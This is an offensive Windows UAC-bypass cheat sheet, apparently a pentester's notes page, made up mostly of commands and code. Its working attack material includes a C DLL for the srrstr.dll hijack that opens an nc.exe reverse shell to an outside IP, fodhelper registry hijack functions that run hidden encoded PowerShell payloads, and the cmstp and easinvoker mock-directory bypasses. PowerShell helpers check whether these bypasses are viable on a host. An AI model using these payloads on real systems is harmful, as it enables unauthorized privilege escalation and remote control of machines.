Enumeration
Check current token privileges and UAC settings with Seatbelt (everything below assumes a member of Administrators running under a filtered, medium-integrity token with UAC at its default level):
PS > .\Seatbelt.exe TokenPrivileges UAC
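If Seatbelt cannot be dropped on the box, the same triage can be done by hand from the UAC policy keys and whoami /groups. This is an added example, not part of the original page; the function and property names are my own.

```powershell
# Added example (not from the original page): manual equivalent of the Seatbelt
# TokenPrivileges/UAC triage. Function and property names are my own choices.
function Get-UacPosture {
    $pol = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    # Absent values fall back to the OS defaults: UAC on, prompt only for
    # non-Windows binaries (5), prompts shown on the secure desktop.
    $enableLua = if ($null -ne $pol.EnableLUA) { [int]$pol.EnableLUA } else { 1 }
    $consent   = if ($null -ne $pol.ConsentPromptBehaviorAdmin) { [int]$pol.ConsentPromptBehaviorAdmin } else { 5 }
    $secureDsk = if ($null -ne $pol.PromptOnSecureDesktop) { [int]$pol.PromptOnSecureDesktop } else { 1 }

    # A filtered admin token still lists BUILTIN\Administrators (S-1-5-32-544) in
    # whoami /groups, tagged "Group used for deny only". whoami is used instead of
    # [Security.Principal.WindowsIdentity]::GetCurrent().Groups, which omits deny-only SIDs.
    $groups    = whoami /groups
    $adminLine = ($groups | Where-Object { $_ -match 'S-1-5-32-544' }) -join ' '
    $isAdmin   = $adminLine -ne ''
    $filtered  = $adminLine -match 'deny only'
    $integrity = switch -Regex ($groups) {
        'S-1-16-16384' { 'System' }
        'S-1-16-12288' { 'High' }
        'S-1-16-8192'  { 'Medium' }
        'S-1-16-4096'  { 'Low' }
    }

    $verdict = if ($enableLua -eq 0) {
        'UAC disabled: administrators already get a full token'
    } elseif (-not $isAdmin) {
        'Not in Administrators: a UAC bypass does not apply, a real privesc is needed'
    } elseif (-not $filtered) {
        'Token is not filtered: already running elevated'
    } elseif ($consent -eq 2) {
        'Always notify: Windows binaries do not auto-elevate, fodhelper/easinvoker-style bypasses will prompt'
    } elseif ($consent -eq 0) {
        'Never notify: elevation requests are approved without a prompt'
    } else {
        'Filtered admin token with auto-elevation on: the bypasses on this page apply'
    }

    [pscustomobject]@{
        EnableLUA                  = $enableLua
        ConsentPromptBehaviorAdmin = $consent
        PromptOnSecureDesktop      = $secureDsk
        AdminGroupMember           = $isAdmin
        TokenFiltered              = [bool]$filtered
        IntegrityLevel             = $integrity
        Verdict                    = $verdict
    }
}

Get-UacPosture | Format-List
```

ConsentPromptBehaviorAdmin is what decides whether the auto-elevation tricks below are silent: 5 (default) and 0 let signed Windows binaries such as fodhelper.exe elevate without a prompt, 2 ("Always notify") makes them prompt like everything else.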
SystemPropertiesAdvanced.exe
srrstr.dll DLL hijacking: the 32-bit SystemPropertiesAdvanced.exe auto-elevates and resolves srrstr.dll through the PATH search order, so a DLL of that name in a user-writable PATH directory runs in the elevated process.
// i686-w64-mingw32-g++ srrstr.c -lws2_32 -o srrstr.dll -shared
#include <windows.h>

// Payload DLL: DllMain runs inside the auto-elevated SystemPropertiesAdvanced.exe
// and spawns a reverse shell through nc.exe.
BOOL WINAPI DllMain(HINSTANCE hinstDll, DWORD dwReason, LPVOID lpReserved) {
    switch (dwReason) {
    case DLL_PROCESS_ATTACH:
        WinExec("C:\\Users\\<USERNAME>\\Documents\\nc.exe 10.10.13.37 1337 -e powershell", 0);
        break;  // original fell through to DLL_PROCESS_DETACH; harmless, but unintended
    case DLL_PROCESS_DETACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
        break;
    }
    return TRUE;  // report a successful load so the host keeps running
}
Upload srrstr.dll to C:\Users\%USERNAME%\AppData\Local\Microsoft\WindowsApps\ (a per-user directory that is on PATH by default) and check that it loads:
PS > rundll32.exe srrstr.dll,xyz
Execute the 32-bit binary from an interactive session (the bypass "requires an interactive window station") and get a shell:
PS > cmd /c C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe
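Before uploading anything, it is worth confirming the preconditions this hijack rests on: the 32-bit target exists, SysWOW64 has no srrstr.dll of its own (System32 is redirected to SysWOW64 for a WOW64 process, so the loader ends up walking PATH), and the WindowsApps folder is actually on PATH. This check is an added example, not code from the original page; the function name is mine.

```powershell
# Added example (not from the original page): checks the preconditions the
# srrstr.dll hijack relies on before anything is uploaded. Function name is mine.
function Test-SrrstrHijack {
    $wow64   = Join-Path $env:SystemRoot 'SysWOW64'
    $dropDir = Join-Path $env:LOCALAPPDATA 'Microsoft\WindowsApps'
    # The 32-bit SystemPropertiesAdvanced.exe asks for srrstr.dll. System32 is
    # redirected to SysWOW64 for a WOW64 process, and SysWOW64 has no srrstr.dll,
    # so the loader falls through to PATH, where the user-writable WindowsApps folder sits.
    $pathDirs = $env:PATH -split ';' | Where-Object { $_ }
    $r = [ordered]@{
        Target          = Join-Path $wow64 'SystemPropertiesAdvanced.exe'
        TargetExists    = Test-Path (Join-Path $wow64 'SystemPropertiesAdvanced.exe')
        NoDllInSysWOW64 = -not (Test-Path (Join-Path $wow64 'srrstr.dll'))
        DropDir         = $dropDir
        DropDirExists   = Test-Path $dropDir
        DropDirOnPath   = [bool]($pathDirs | Where-Object { $_.TrimEnd('\') -ieq $dropDir })
        AlreadyPlanted  = Test-Path (Join-Path $dropDir 'srrstr.dll')
    }
    $r.Viable = $r.TargetExists -and $r.NoDllInSysWOW64 -and $r.DropDirOnPath
    [pscustomobject]$r
}

Test-SrrstrHijack | Format-List
```

If Viable is false because DropDirOnPath is false, look for another PATH entry the current user can write to rather than assuming the WindowsApps location; if AlreadyPlanted is true, someone else has been here first.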
cmstp.exe
Compile from source, load and execute:
PS > Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\Source.cs")) -ReferencedAssemblies "System.Windows.Forms" -OutputAssembly "CMSTP-UAC-Bypass.dll"
PS > [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("$pwd\CMSTP-UAC-Bypass.dll"))
PS > [CMSTPBypass]::Execute("C:\Windows\System32\cmd.exe")
Or, with the same technique wrapped in a PowerShell function, load and execute:
PS > Bypass-UAC -C "C:\Windows\System32\cmd.exe"
easinvoker.exe
Build a mock trusted directory "C:\Windows \System32" (note the trailing space; the \\?\ prefix stops Win32 path normalization from stripping it) and run the auto-elevating easinvoker.exe from there so that it loads the netutils.dll placed next to it:
mkdir "\\?\C:\Windows "
mkdir "\\?\C:\Windows \System32"
copy c:\windows\system32\easinvoker.exe "C:\Windows \System32"
copy netutils.dll "C:\Windows \System32"
"C:\Windows \System32\easinvoker.exe"
Clean up:
del /q "C:\Windows \System32\*"
rmdir "C:\Windows \System32"
rmdir "C:\Windows \"
fodhelper.exe
Create and set the registry values (the payload here is a DLL generated with charlotte.py; any other command can take the place of the rundll32 line):
PS > New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
PS > New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
PS > Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "rundll32 C:\Windows\System32\spool\drivers\color\met.dll, SUJIzDKv" -Force
Trigger fodhelper.exe:
PS > Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
Clean up:
PS > Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
Another way to do it with a script (runs a renamed copy of powershell.exe from C:\Windows\Tasks instead of powershell.exe itself):
function Fod {
$cmd = "C:\Windows\Tasks\foo.exe -enc <BASE64_CMD>"
copy C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Tasks\foo.exe
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force -ErrorAction SilentlyContinue
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $cmd -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
Start-Sleep -s 3
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force -ErrorAction SilentlyContinue
}
The same thing with ProgID abuse (ms-settings\CurVer is pointed at a custom ProgID, whose Shell\Open\command is what fodhelper ends up running):
function FodNG {
Param (
[String]$cmd = "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -NoP -NoLogo -exec Bypass -enc <BASE64_CMD>"
)
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force -ErrorAction SilentlyContinue
New-Item "HKCU:\Software\Classes\.uacbypass\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\.uacbypass\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty "HKCU:\Software\Classes\.uacbypass\Shell\Open\command" -Name "(default)" -Value $cmd -Force
New-Item -Path "HKCU:\Software\Classes\ms-settings\CurVer" -Force
Set-ItemProperty "HKCU:\Software\Classes\ms-settings\CurVer" -Name "(default)" -value ".uacbypass" -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
Start-Sleep 3
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
Remove-Item "HKCU:\Software\Classes\.uacbypass\" -Recurse -Force
}
The same ProgID variant with plain reg.exe commands:
reg add HKCU\Software\Classes\.uacbypass\Shell\Open\command /f
reg add HKCU\Software\Classes\.uacbypass\Shell\Open\command /v DelegateExecute /f
reg add HKCU\Software\Classes\.uacbypass\Shell\Open\command /ve /d C:\Windows\System32\cmd.exe /f
reg add HKCU\Software\Classes\ms-settings\CurVer /f
reg add HKCU\Software\Classes\ms-settings\CurVer /ve /d .uacbypass /f
C:\Windows\System32\fodhelper.exe
reg delete HKCU\Software\Classes\ms-settings /f
reg delete HKCU\Software\Classes\.uacbypass /f
SilentCleanup
SCM UAC Bypass
Task Scheduler
Tricks
Bypass UAC for file read/write by mapping the C$ admin share over loopback. The SMB network logon is not subject to the filtering the interactive session got, so this works when the account gets an unfiltered token on network logon (a domain account in local Administrators, the built-in RID 500 Administrator, or LocalAccountTokenFilterPolicy=1):
Cmd > net use A: \\127.0.0.1\C$
Cmd > A:
Cmd > cd \Windows\System32
Cmd > echo test > test.txt
Cmd > dir test.txt